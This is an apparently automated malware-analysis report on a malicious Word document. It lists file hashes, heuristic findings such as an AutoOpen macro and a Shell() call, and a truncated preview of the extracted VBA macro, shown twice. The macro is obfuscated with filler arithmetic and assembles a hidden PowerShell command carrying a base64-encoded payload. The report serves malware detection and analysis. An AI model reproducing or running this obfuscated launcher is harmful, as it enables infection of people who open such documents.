Office (OLE) malware analysis — malicious · 007e859ce0403b6e

MALICIOUS

Office (OLE)

112.8 KB Created: 2018-05-25 07:05:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: bae05f14ed147dd13ef2b084cfc6419b SHA-1: a5dee5411ef78a09dd2bec901a468cb24cd83324 SHA-256: 007e859ce0403b6e51acdcae39e7e5e05f4ecf5f85efa23ffb904909baf112ab

182 Risk Score

Heuristics 6

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 115,456 bytes but its declared streams total only 36,047 bytes — 79,409 bytes (69%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15765 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15765 bytes
SHA-256: `bcd50a89f48155ac74d2eabe9cf4e7a68d105610e738d88c1851d8e298a30f52`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "zzckFrYYC" Function OZBGiUw() On Error Resume Next rjKdt = wTJdAo - Cos(EjjIa) * 1 - Chr(2091) / 21700 - ChrB(zOwJH) dTszz = 87180 ocPCSzVXI = "owersH" + "eLL -WinDow" + "sTyle " + "hidden -e I" + "AAuACgAKABnAG" + "UAVAAtA" + "HYAYQBy" + "AEkAQQBCAGw" + "AZQAgACc" + "AKgBtAEQAcgAqAC" QHmLMs = zGduTc - Cos(oIVkSK) * 1 - Chr(98123) / 84957 - ChrB(LUmXS) QiAvb = 77451 XziUj = "cAKQAuAG4AYQ" + "BNAEUA" + "WwAzACwAMQ" + "AxACwA" + "MgBdAC0AagBvA" + "EkAbgAnACcAKQAo" + "ACAAKA" + "AoACIAewAxADcA" + "fQB7ADEAMAB9AHs" + "ANAA3AH0A" zwOIR = skEqi - Cos(oKXOjj) * 1 - Chr(84930) / 46250 - ChrB(arZVaz) wtXBAP = 22323 jZpqOsawF = "ewAxADIANgB9AH" + "sANwAzAH0Aew" + "AzADEAfQ" + "B7ADkANAB" + "9AHsAMQAxAD" WKsoz = HdIviq - Cos(PUMjQk) * 1 - Chr(43807) / 10370 - ChrB(mrLDmL) dbZww = 85519 vGmKjHbzOr = "UAfQB7ADk" + "AOQB9AH" + "sANQA5AH" + "0AewA" + "xADAAMAB9AHs" + "AOQAwAH0Ae" + "wAzADcAf" OZBGiUw = ocPCSzVXI + XziUj + jZpqOsawF + vGmKjHbzOr End Function Function UEWdJEAOsON() On Error Resume Next rDYGT = RawJw - Cos(ZLRkio) * 1 - Chr(37360) / 64912 - ChrB(Acvvv) iTFru = 45208 nZZWSjTS = "QB7ADEAMgA0A" + "H0AewA3ADAAf" + "QB7ADIAMQB9A" + "HsAMAB9" + "AHsAMgA3A" VfriDr = MuCGD - Cos(HLruJf) * 1 - Chr(20614) / 95780 - ChrB(bcLXCm) rRCLb = 81410 TnbmfV = "H0Aew" + "A4ADYAfQB7AD" + "YAMQB9AHsAOQA4A" + "H0AewA" + "1ADUA" sAlbKL = aprKD - Cos(cKhPM) * 1 - Chr(362) / 59404 - ChrB(OSjok) DkEsK = 33068 msPQuEM = "fQB7A" + "DQAMAB9AHsANwB9" + "AHsAMQAwADYAf" + "QB7ADYAN" + "gB9AHs" + "AMwA4AH" + "0AewA1ADYAfQB7" + "ADgAMQB9AH" + "sAMQAxA" wuYDA = jAnTNz - Cos(ijkmw) * 1 - Chr(52339) / 22013 - ChrB(ihFmZF) qkwzm = 89196 IXXHUBarZ = "DQAfQB7ADIAN" + "gB9AHsANQA3A" + "H0AewA3ADQAf" + "QB7ADEAMgAxAH0" + "AewA3ADYAf" + "QB7ADEA" + "MAA3AH0AewA0A" + "DEAfQ" QJLMOu = awSpR - Cos(WASujF) * 1 - Chr(82873) / 39249 - ChrB(TQajj) DUNNY = 823 OMwkNnGjrJ = "B7ADYAMgB" + "9AHsA" + "NAA0AH0AewAxAD" + "EAMgB9AHsA" + "NwA5AH0AewAx" + "ADkAfQB7AD" balMQ = DjmzIi - Cos(qSEQjD) * 1 - Chr(17734) / 8098 - ChrB(vmiOtX) FbsbGY = 83805 uKIcNUipZJ = "YAfQB7AD" + "UAOAB9AHs" + "ANwA1AH0AewAxA" + "DIAMAB9AHs" + "AMQAyAH0Aew" + "A4ADQAfQB7A" + "DEAMQB" + "9AHsAMQ" + "A1AH0AewAxADQAf" WpMQd = SRBATl - Cos(zhVrM) * 1 - Chr(72502) / 59851 - ChrB(iCkjEj) PCaRa = 91740 HlFiOHTzd = "QB7ADEAM" + "QA4AH0AewAxAD" + "IANQB9AHsAO" + "AA4AH0Aew" + "AxADAAMwB9A" + "HsAMQAx" + "ADMAfQB7" + "ADEAMQA5AH0AewA" + "4ADkAfQB7" qqsaIc = jNZmN - Cos(uXkun) * 1 - Chr(23961) / 18591 - ChrB(mckYAw) zaCKU = 6857 rZisqw = "ADcAMQB9AH" + "sANgA5AH0" + "AewA2ADUAfQB7" + "ADQAOAB9AHsA" fwldCi = pKurZc - Cos(SfiOmC) * 1 - Chr(7937) / 26442 - ChrB(CHjRj) XbtEDs = 72163 ZqRPLwT = "OAA1A" + "H0AewA0ADUAfQB" + "7ADQANg" + "B9AHsAOQA1AH0Ae" + "wA4ADAAfQB7" + "ADgAMwB9AHsAMgA" + "wAH0Aew" + "AxADEAMAB9AHsAN" JKitz = qhbUK - Cos(uYwiBm) * 1 - Chr(33354) / 82082 - ChrB(VWMRCn) zVYzj = 44287 KohfU = "QAwAH0A" + "ewAxADEAMQ" + "B9AHsANw" + "AyAH0AewA" + "xADEANgB9A" + "HsAMQAyADMAfQB7" + "ADEAfQB" + "7ADMAOQB9AHsA" + "MwB9AHsA" + "NQA0AH0AewAzAD" UEWdJEAOsON = nZZWSjTS + TnbmfV + msPQuEM + IXXHUBarZ + OMwkNnGjrJ + uKIcNUipZJ + HlFiOHTzd + rZisqw + ZqRPLwT + KohfU End Function Function NujwnRHpS() On Error Resume Next EHJGv = VjLHz - Cos(zfKCRb) * 1 - Chr(90080) / 51031 - ChrB(nSbviX) GvLAXD = 85114 iKEpKhunPCJ = "MAfQB7" + "ADUAfQB7AD" + "QAMwB9AHsAMg" + "AzAH0Aew" + "AxADA" + "AMgB9AHsAOQB9A" + "HsAOQAzAH0AewA" + "5ADcAfQ" + "B7ADUAMgB9AHs" + "ANgA4A" sfVYMo = FSJon - Cos(SGYlwj) * 1 - Chr(31306) / 78730 - ChrB(KRumaQ) zUwmjK = 72233 zIVKtJOdEC = "H0Aew" + "A0ADkAfQB7" + "ADEAM" + "gAyAH0Ae" WNzdM = lqjwn - Cos(nObWbm) * 1 - Chr(20414) / 40608 - ChrB(daOuK) psBDH = 41176 ibwqCP = "wAzADQAfQB7A" + "DYAMAB9AHsA" + "MQAzAH0A" + "ewA1A" + "DEAfQB7" Pihmc = ZbLpm - Cos(IktZKw) * 1 - Chr(190) / 31632 - ChrB(smljC) wzisjT = 39918 GwWwaqwrXz = "ADkAMgB9AHsA" + "MwAyAH0AewA0ADI" + "AfQB7A" + "DMANgB9AHsAOQA2" + "AH0AewAxADgAfQB" + "7ADgA" + "NwB9AHsA" + "MQAwADE" + "AfQB7ADUAMwB9AH" + "sAMQA" sppJmv = SkbSBi - Cos(SqGHEQ) * 1 - Chr(444 ... (truncated)

SHA-256: bcd50a89f48155ac74d2eabe9cf4e7a68d105610e738d88c1851d8e298a30f52

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "zzckFrYYC"
Function OZBGiUw()
On Error Resume Next
rjKdt = wTJdAo - Cos(EjjIa) * 1 - Chr(2091) / 21700 - ChrB(zOwJH)
dTszz = 87180
ocPCSzVXI = "owersH" + "eLL -WinDow" + "sTyle " + "hidden -e I" + "AAuACgAKABnAG" + "UAVAAtA" + "HYAYQBy" + "AEkAQQBCAGw" + "AZQAgACc" + "AKgBtAEQAcgAqAC"
QHmLMs = zGduTc - Cos(oIVkSK) * 1 - Chr(98123) / 84957 - ChrB(LUmXS)
QiAvb = 77451
XziUj = "cAKQAuAG4AYQ" + "BNAEUA" + "WwAzACwAMQ" + "AxACwA" + "MgBdAC0AagBvA" + "EkAbgAnACcAKQAo" + "ACAAKA" + "AoACIAewAxADcA" + "fQB7ADEAMAB9AHs" + "ANAA3AH0A"
zwOIR = skEqi - Cos(oKXOjj) * 1 - Chr(84930) / 46250 - ChrB(arZVaz)
wtXBAP = 22323
jZpqOsawF = "ewAxADIANgB9AH" + "sANwAzAH0Aew" + "AzADEAfQ" + "B7ADkANAB" + "9AHsAMQAxAD"
WKsoz = HdIviq - Cos(PUMjQk) * 1 - Chr(43807) / 10370 - ChrB(mrLDmL)
dbZww = 85519
vGmKjHbzOr = "UAfQB7ADk" + "AOQB9AH" + "sANQA5AH" + "0AewA" + "xADAAMAB9AHs" + "AOQAwAH0Ae" + "wAzADcAf"
OZBGiUw = ocPCSzVXI + XziUj + jZpqOsawF + vGmKjHbzOr
End Function
Function UEWdJEAOsON()
On Error Resume Next
rDYGT = RawJw - Cos(ZLRkio) * 1 - Chr(37360) / 64912 - ChrB(Acvvv)
iTFru = 45208
nZZWSjTS = "QB7ADEAMgA0A" + "H0AewA3ADAAf" + "QB7ADIAMQB9A" + "HsAMAB9" + "AHsAMgA3A"
VfriDr = MuCGD - Cos(HLruJf) * 1 - Chr(20614) / 95780 - ChrB(bcLXCm)
rRCLb = 81410
TnbmfV = "H0Aew" + "A4ADYAfQB7AD" + "YAMQB9AHsAOQA4A" + "H0AewA" + "1ADUA"
sAlbKL = aprKD - Cos(cKhPM) * 1 - Chr(362) / 59404 - ChrB(OSjok)
DkEsK = 33068
msPQuEM = "fQB7A" + "DQAMAB9AHsANwB9" + "AHsAMQAwADYAf" + "QB7ADYAN" + "gB9AHs" + "AMwA4AH" + "0AewA1ADYAfQB7" + "ADgAMQB9AH" + "sAMQAxA"
wuYDA = jAnTNz - Cos(ijkmw) * 1 - Chr(52339) / 22013 - ChrB(ihFmZF)
qkwzm = 89196
IXXHUBarZ = "DQAfQB7ADIAN" + "gB9AHsANQA3A" + "H0AewA3ADQAf" + "QB7ADEAMgAxAH0" + "AewA3ADYAf" + "QB7ADEA" + "MAA3AH0AewA0A" + "DEAfQ"
QJLMOu = awSpR - Cos(WASujF) * 1 - Chr(82873) / 39249 - ChrB(TQajj)
DUNNY = 823
OMwkNnGjrJ = "B7ADYAMgB" + "9AHsA" + "NAA0AH0AewAxAD" + "EAMgB9AHsA" + "NwA5AH0AewAx" + "ADkAfQB7AD"
balMQ = DjmzIi - Cos(qSEQjD) * 1 - Chr(17734) / 8098 - ChrB(vmiOtX)
FbsbGY = 83805
uKIcNUipZJ = "YAfQB7AD" + "UAOAB9AHs" + "ANwA1AH0AewAxA" + "DIAMAB9AHs" + "AMQAyAH0Aew" + "A4ADQAfQB7A" + "DEAMQB" + "9AHsAMQ" + "A1AH0AewAxADQAf"
WpMQd = SRBATl - Cos(zhVrM) * 1 - Chr(72502) / 59851 - ChrB(iCkjEj)
PCaRa = 91740
HlFiOHTzd = "QB7ADEAM" + "QA4AH0AewAxAD" + "IANQB9AHsAO" + "AA4AH0Aew" + "AxADAAMwB9A" + "HsAMQAx" + "ADMAfQB7" + "ADEAMQA5AH0AewA" + "4ADkAfQB7"
qqsaIc = jNZmN - Cos(uXkun) * 1 - Chr(23961) / 18591 - ChrB(mckYAw)
zaCKU = 6857
rZisqw = "ADcAMQB9AH" + "sANgA5AH0" + "AewA2ADUAfQB7" + "ADQAOAB9AHsA"
fwldCi = pKurZc - Cos(SfiOmC) * 1 - Chr(7937) / 26442 - ChrB(CHjRj)
XbtEDs = 72163
ZqRPLwT = "OAA1A" + "H0AewA0ADUAfQB" + "7ADQANg" + "B9AHsAOQA1AH0Ae" + "wA4ADAAfQB7" + "ADgAMwB9AHsAMgA" + "wAH0Aew" + "AxADEAMAB9AHsAN"
JKitz = qhbUK - Cos(uYwiBm) * 1 - Chr(33354) / 82082 - ChrB(VWMRCn)
zVYzj = 44287
KohfU = "QAwAH0A" + "ewAxADEAMQ" + "B9AHsANw" + "AyAH0AewA" + "xADEANgB9A" + "HsAMQAyADMAfQB7" + "ADEAfQB" + "7ADMAOQB9AHsA" + "MwB9AHsA" + "NQA0AH0AewAzAD"
UEWdJEAOsON = nZZWSjTS + TnbmfV + msPQuEM + IXXHUBarZ + OMwkNnGjrJ + uKIcNUipZJ + HlFiOHTzd + rZisqw + ZqRPLwT + KohfU
End Function
Function NujwnRHpS()
On Error Resume Next
EHJGv = VjLHz - Cos(zfKCRb) * 1 - Chr(90080) / 51031 - ChrB(nSbviX)
GvLAXD = 85114
iKEpKhunPCJ = "MAfQB7" + "ADUAfQB7AD" + "QAMwB9AHsAMg" + "AzAH0Aew" + "AxADA" + "AMgB9AHsAOQB9A" + "HsAOQAzAH0AewA" + "5ADcAfQ" + "B7ADUAMgB9AHs" + "ANgA4A"
sfVYMo = FSJon - Cos(SGYlwj) * 1 - Chr(31306) / 78730 - ChrB(KRumaQ)
zUwmjK = 72233
zIVKtJOdEC = "H0Aew" + "A0ADkAfQB7" + "ADEAM" + "gAyAH0Ae"
WNzdM = lqjwn - Cos(nObWbm) * 1 - Chr(20414) / 40608 - ChrB(daOuK)
psBDH = 41176
ibwqCP = "wAzADQAfQB7A" + "DYAMAB9AHsA" + "MQAzAH0A" + "ewA1A" + "DEAfQB7"
Pihmc = ZbLpm - Cos(IktZKw) * 1 - Chr(190) / 31632 - ChrB(smljC)
wzisjT = 39918
GwWwaqwrXz = "ADkAMgB9AHsA" + "MwAyAH0AewA0ADI" + "AfQB7A" + "DMANgB9AHsAOQA2" + "AH0AewAxADgAfQB" + "7ADgA" + "NwB9AHsA" + "MQAwADE" + "AfQB7ADUAMwB9AH" + "sAMQA"
sppJmv = SkbSBi - Cos(SqGHEQ) * 1 - Chr(444
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.